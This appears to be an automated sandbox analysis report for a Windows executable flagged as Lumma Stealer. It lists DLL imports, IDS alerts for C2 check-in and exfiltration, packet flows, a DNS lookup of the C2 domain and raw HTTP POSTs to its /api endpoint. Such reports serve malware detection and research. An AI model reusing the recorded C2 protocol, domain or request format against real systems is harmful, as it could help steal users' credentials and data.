                                                                      KERNEL32.dllCloseHandle, CompareStringW, CreateEventW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, GlobalFindAtomW, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ResetEvent, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetEvent, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-10-30T22:23:00.028830+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.41.39443TCP
                                                                      2024-10-30T22:23:00.028830+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.41.39443TCP
                                                                      2024-10-30T22:23:01.444131+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706104.21.41.39443TCP
                                                                      2024-10-30T22:23:01.444131+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706104.21.41.39443TCP
                                                                      2024-10-30T22:23:03.137386+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549709104.21.41.39443TCP
                                                                      2024-10-30T22:23:08.621674+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549716104.21.41.39443TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 30, 2024 22:22:58.636281967 CET49704443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:22:58.636348963 CET44349704104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:22:58.636445999 CET49704443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:22:58.637974977 CET49704443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:22:58.638011932 CET44349704104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:22:59.254863024 CET44349704104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:22:59.254950047 CET49704443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:22:59.259042025 CET49704443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:22:59.259067059 CET44349704104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:22:59.259350061 CET44349704104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:22:59.304045916 CET49704443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:22:59.308721066 CET49704443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:22:59.308757067 CET49704443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:22:59.308805943 CET44349704104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:00.028834105 CET44349704104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:00.029479027 CET44349704104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:00.029555082 CET49704443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:00.030652046 CET49704443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:00.030709028 CET44349704104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:00.128081083 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:00.128158092 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:00.128236055 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:00.128746986 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:00.128782034 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:00.752458096 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:00.752594948 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:00.753911972 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:00.753925085 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:00.754192114 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:00.755477905 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:00.755508900 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:00.755542040 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.444123983 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.444204092 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.444231987 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.444262028 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.444303989 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.444303989 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:01.444360971 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.444392920 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:01.444416046 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:01.444665909 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.444770098 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.445399046 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.445456028 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:01.445472956 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.445529938 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:01.565004110 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.565146923 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.565174103 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.565237045 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:01.565263987 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.565284967 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.565326929 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:01.565901995 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:01.565938950 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.565965891 CET49706443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:01.565982103 CET44349706104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.699404955 CET49709443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:01.699489117 CET44349709104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:01.699567080 CET49709443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:01.699851990 CET49709443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:01.699882984 CET44349709104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:02.318469048 CET44349709104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:02.318581104 CET49709443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:02.336643934 CET49709443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:02.336694002 CET44349709104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:02.336908102 CET44349709104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:02.382190943 CET49709443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:02.391796112 CET49709443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:02.391974926 CET49709443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:02.392016888 CET44349709104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:03.137389898 CET44349709104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:03.137471914 CET44349709104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:03.137536049 CET49709443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:03.137639046 CET49709443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:03.137693882 CET44349709104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:03.252726078 CET49713443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:03.252804041 CET44349713104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:03.252970934 CET49713443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:03.253281116 CET49713443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:03.253319025 CET44349713104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:03.882649899 CET44349713104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:03.882749081 CET49713443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:03.883966923 CET49713443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:03.883994102 CET44349713104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:03.884208918 CET44349713104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:03.891202927 CET49713443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:03.891393900 CET49713443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:03.891433954 CET44349713104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:03.891499043 CET49713443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:03.891511917 CET44349713104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:04.423563957 CET44349713104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:04.423639059 CET44349713104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:04.423708916 CET49713443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:04.423898935 CET49713443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:04.423938990 CET44349713104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:04.627496004 CET49714443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:04.627533913 CET44349714104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:04.627610922 CET49714443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:04.627960920 CET49714443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:04.627978086 CET44349714104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:05.291425943 CET44349714104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:05.291524887 CET49714443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:05.292684078 CET49714443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:05.292697906 CET44349714104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:05.292896032 CET44349714104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:05.298466921 CET49714443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:05.298666000 CET49714443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:05.298696995 CET44349714104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:05.298763990 CET49714443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:05.298774958 CET44349714104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:06.159440994 CET44349714104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:06.159511089 CET44349714104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:06.159589052 CET49714443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:06.159903049 CET49714443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:06.159925938 CET44349714104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:06.428049088 CET49715443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:06.428145885 CET44349715104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:06.428247929 CET49715443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:06.428564072 CET49715443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:06.428601027 CET44349715104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:07.044147968 CET44349715104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:07.044245005 CET49715443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:07.045849085 CET49715443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:07.045876026 CET44349715104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:07.046118021 CET44349715104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:07.047590971 CET49715443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:07.047730923 CET49715443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:07.047743082 CET44349715104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:07.542850018 CET44349715104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:07.542927980 CET44349715104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:07.543127060 CET49715443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:07.543524981 CET49715443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:07.543556929 CET44349715104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:07.989247084 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:07.989310026 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:07.989597082 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:07.989804029 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:07.989835978 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.616506100 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.616655111 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.618254900 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.618273973 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.618524075 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.620001078 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.621032000 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.621073961 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.621217966 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.621260881 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.621417999 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.621465921 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.621674061 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.621725082 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.621925116 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.621979952 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.622246981 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.622291088 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.622312069 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.622342110 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.622447968 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.622487068 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.622555971 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.622651100 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.622699976 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.633173943 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.633394003 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.633440018 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:08.633490086 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.633584023 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:08.639352083 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:10.451776028 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:10.451894045 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:10.451956034 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:10.452084064 CET49716443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:10.452106953 CET44349716104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:10.488492966 CET49718443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:10.488558054 CET44349718104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:10.488662958 CET49718443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:10.488945961 CET49718443192.168.2.5104.21.41.39
                                                                      Oct 30, 2024 22:23:10.488981009 CET44349718104.21.41.39192.168.2.5
                                                                      Oct 30, 2024 22:23:10.585362911 CET49718443192.168.2.5104.21.41.39
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 30, 2024 22:22:58.603852987 CET5451653192.168.2.51.1.1.1
                                                                      Oct 30, 2024 22:22:58.628040075 CET53545161.1.1.1192.168.2.5
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 30, 2024 22:22:58.603852987 CET192.168.2.51.1.1.10xdedbStandard query (0)forbidstow.siteA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 30, 2024 22:22:58.628040075 CET1.1.1.1192.168.2.50xdedbNo error (0)forbidstow.site104.21.41.39A (IP address)IN (0x0001)false
                                                                      Oct 30, 2024 22:22:58.628040075 CET1.1.1.1192.168.2.50xdedbNo error (0)forbidstow.site172.67.142.84A (IP address)IN (0x0001)false
                                                                      • forbidstow.site
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.549704104.21.41.394434088C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 21:22:59 UTC262OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: forbidstow.site
                                                                      2024-10-30 21:22:59 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
                                                                      2024-10-30 21:23:00 UTC1015INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 21:22:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=1j7crstjdmamnah9nf13n98cao; expires=Sun, 23-Feb-2025 15:09:38 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ISPIb6%2BKyOskOTZKZObjq69m%2BoGlQOpyHRTAEHSw92iF4llF5cSNy3ujvNiy5KCcKGyoKkKQYC3cTjlYiAhxG%2FtQNp%2FySTzLNocJo%2BIB516oiULuGvN%2FkN8m5c4FakciIY0%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8dae76c11e886b4d-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1180&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=2329847&cwnd=251&unsent_bytes=0&cid=da295d8c86809bcb&ts=790&x=0"
                                                                      2024-10-30 21:23:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                      Data Ascii: 2ok
                                                                      2024-10-30 21:23:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.549706104.21.41.394434088C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 21:23:00 UTC263OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 45
                                                                      Host: forbidstow.site
                                                                      2024-10-30 21:23:00 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 31 4e 43 57 32 35 2d 2d 34 32 34 26 6a 3d
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=1NCW25--424&j=
                                                                      2024-10-30 21:23:01 UTC1010INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 21:23:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=ftob4os5irtfieg7hsno3nlkfp; expires=Sun, 23-Feb-2025 15:09:40 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2E2cd10b7jAEHMUmc332Kol5lpDjXE1jrG5pG8yn1dD7Cm%2FB2uC%2FY8zBmmplZsSBLsOr6snME3uLLakI%2B68QyDYIfFNL5GWwOqVCC%2Bu2n6yCNiDtJbWCqyeVvaJknzfJI1U%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8dae76ca2f3bddae-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1092&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=944&delivery_rate=2604316&cwnd=32&unsent_bytes=0&cid=c6923fafce2fb8ca&ts=697&x=0"
                                                                      2024-10-30 21:23:01 UTC359INData Raw: 34 64 64 0d 0a 47 6d 4b 68 61 6f 65 4e 46 58 69 41 58 7a 54 2b 71 6a 33 68 6d 4d 47 6c 39 48 66 56 6a 33 32 61 4f 48 74 6d 46 69 66 6b 61 52 78 68 51 4e 64 49 76 62 6b 35 57 76 4d 36 46 73 54 65 54 35 54 39 37 59 65 56 45 2f 65 31 47 2f 74 55 43 41 4d 36 42 5a 49 45 50 69 41 45 77 41 62 30 36 44 6c 61 35 53 63 57 78 50 46 47 77 2f 32 76 68 38 35 56 73 4f 55 66 2b 31 51 5a 42 33 31 49 6c 41 56 2f 63 67 37 47 41 75 4c 75 63 52 6e 73 4d 6c 47 62 7a 31 79 4c 39 71 6a 49 6e 42 72 33 6f 31 2f 2f 51 6c 6c 63 4e 47 71 42 48 58 31 58 41 39 49 42 70 66 41 35 41 36 49 36 57 74 79 51 48 34 44 39 6f 38 6d 53 45 37 37 6e 46 66 4a 63 47 41 4a 38 56 34 30 50 64 48 49 41 78 51 50 6f 35 32 55 55 35 6a 56 61 6e 63 56 63 77 37 54 6a 77 49 35 56 37 36 31 4d 79 6c 6b 49 46 57
                                                                      Data Ascii: 4ddGmKhaoeNFXiAXzT+qj3hmMGl9HfVj32aOHtmFifkaRxhQNdIvbk5WvM6FsTeT5T97YeVE/e1G/tUCAM6BZIEPiAEwAb06Dla5ScWxPFGw/2vh85VsOUf+1QZB31IlAV/cg7GAuLucRnsMlGbz1yL9qjInBr3o1//QllcNGqBHX1XA9IBpfA5A6I6WtyQH4D9o8mSE77nFfJcGAJ8V40PdHIAxQPo52UU5jVancVcw7TjwI5V761MylkIFW
                                                                      2024-10-30 21:23:01 UTC893INData Raw: 5a 64 6d 64 70 55 69 76 65 75 78 35 73 66 75 4f 34 66 2f 31 41 54 43 33 35 42 69 77 5a 34 65 41 43 44 52 71 58 6f 62 31 71 36 66 58 57 5a 32 46 69 50 37 4f 48 39 31 67 72 35 39 46 2f 2f 56 6c 6c 63 4e 45 32 44 43 48 31 7a 44 38 41 41 37 76 31 33 43 4f 51 77 55 34 37 4f 57 6f 33 77 6f 4e 57 63 47 37 48 75 46 76 4e 54 48 41 4e 77 42 63 68 4c 65 57 42 41 6d 30 6a 45 34 6e 77 57 36 43 70 57 33 4e 63 52 6d 72 71 6b 79 39 5a 4e 39 2b 6b 65 2f 46 73 64 43 6e 70 42 69 67 31 77 64 51 2f 46 41 75 58 6f 66 52 4c 71 50 46 75 58 78 31 2b 47 39 36 66 42 6d 68 53 79 72 56 47 34 58 51 46 45 4c 41 57 6f 44 48 31 71 51 76 59 4c 36 2b 46 77 44 4b 49 69 47 49 57 49 57 49 2b 36 2b 34 65 59 45 4c 6a 2f 48 75 70 66 46 78 5a 34 51 49 41 47 66 58 59 41 78 67 2f 6f 34 58 45 64 34
                                                                      Data Ascii: ZdmdpUiveux5sfuO4f/1ATC35BiwZ4eACDRqXob1q6fXWZ2FiP7OH91gr59F//VllcNE2DCH1zD8AA7v13COQwU47OWo3woNWcG7HuFvNTHANwBchLeWBAm0jE4nwW6CpW3NcRmrqky9ZN9+ke/FsdCnpBig1wdQ/FAuXofRLqPFuXx1+G96fBmhSyrVG4XQFELAWoDH1qQvYL6+FwDKIiGIWIWI+6+4eYELj/HupfFxZ4QIAGfXYAxg/o4XEd4
                                                                      2024-10-30 21:23:01 UTC1369INData Raw: 33 66 38 66 0d 0a 6e 67 54 36 7a 52 45 6c 73 52 52 6b 66 65 70 77 70 67 5a 73 75 49 66 2b 56 73 58 44 6e 38 46 79 45 74 35 59 45 43 62 53 4d 72 69 5a 77 6a 6f 4e 6b 66 65 2f 56 79 4e 39 4b 54 52 31 67 72 35 39 46 2f 2f 56 6c 6c 63 4e 45 36 41 42 33 4a 34 42 74 45 47 36 76 31 39 43 4f 59 7a 55 70 44 47 56 6f 37 31 70 74 57 53 46 61 58 73 47 76 39 55 46 42 5a 78 42 63 68 4c 65 57 42 41 6d 30 6a 66 32 33 41 4b 38 7a 6f 55 71 63 74 52 6a 66 32 31 68 34 6c 62 72 71 30 59 39 42 70 42 52 48 64 4a 69 77 4a 37 64 78 4c 4a 42 4f 54 39 63 42 50 72 4e 31 65 53 78 31 53 50 2f 37 48 4d 6d 52 32 34 37 42 4c 31 55 52 30 45 4e 41 76 47 44 47 59 34 57 49 4d 70 36 4f 42 6c 47 66 4e 2f 59 35 2f 47 55 59 54 73 34 39 6a 59 44 50 66 71 45 37 67 43 57 51 56 34 53 59 63 45 65 48
                                                                      Data Ascii: 3f8fngT6zRElsRRkfepwpgZsuIf+VsXDn8FyEt5YECbSMriZwjoNkfe/VyN9KTR1gr59F//VllcNE6AB3J4BtEG6v19COYzUpDGVo71ptWSFaXsGv9UFBZxBchLeWBAm0jf23AK8zoUqctRjf21h4lbrq0Y9BpBRHdJiwJ7dxLJBOT9cBPrN1eSx1SP/7HMmR247BL1UR0ENAvGDGY4WIMp6OBlGfN/Y5/GUYTs49jYDPfqE7gCWQV4SYcEeH
